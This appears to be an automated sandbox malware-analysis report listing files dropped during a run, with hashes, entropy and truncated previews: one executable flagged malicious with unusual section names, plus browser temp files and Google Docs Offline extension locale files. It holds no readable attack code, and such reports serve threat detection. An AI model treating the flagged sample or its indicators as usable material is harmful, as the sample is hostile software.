                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:JhsQPljqzshikccrx5emV+SJzyFNG8Fe9rCuoT8cGUNguuxmz3PZbTn/YSug2:DvljqwccrykhkGxW54UNgFUtD8x
                                                                                                                                                                                                                                                                                      MD5:8016C72A6E4BF40375E31E867F487FA7
                                                                                                                                                                                                                                                                                      SHA1:98CEE0E4A8751579ECE1E66CB6429EA912526410
                                                                                                                                                                                                                                                                                      SHA-256:6F8F6F652654B2CDF67A5FE92652E349DA600DFCA2076F3D41B9C336434DB169
                                                                                                                                                                                                                                                                                      SHA-512:769CB20163E136187B03E99DFEBEAAA4AC4B7815A95B105F511D2AE76BD38F9A882C53380745F1222FC6DCC64A1D8858E8E2E2484F9689B8BD1896B06A9B6685
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................pM...........@...........................M.....^.....@.................................W...k.......H....................OM.............................`OM..................................................... . ............................@....rsrc...H...........................@....idata ............................@... ..+.........................@...hicendxx......2.....................@...qvwfrqsg.....`M.....................@....taggant.0...pM.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.415323489829386
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0CwHmlC5Bw85W8:JIVuwEw5MUFZLBQLtWQCWh7rM
                                                                                                                                                                                                                                                                                      MD5:5C6E4AD9A8ED3E5BE490F0E3F212B7DC
                                                                                                                                                                                                                                                                                      SHA1:E6D900E2A10019ECC12F2085CB9A54C6D0B78E10
                                                                                                                                                                                                                                                                                      SHA-256:40C8A3FA8D95F5D9ACED83E7BF0CD2DA9E1AF581D813CE2548343F40FB8E8B64
                                                                                                                                                                                                                                                                                      SHA-512:96D2BC2630CD30463C203F61AB99595137565B09696173F742E930D9882745084346E42AB576DD525F2836F89E70F4F0D3F8C6A64F0F03FC9720DBC7A3AE0CA4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\f970459a-4e6b-43cb-b8c5-c71275f804ce.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                                                      MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                                                      SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                                                      SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                                                      SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\2e2a348a-2e3b-484f-92f5-12eda4b8766e.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
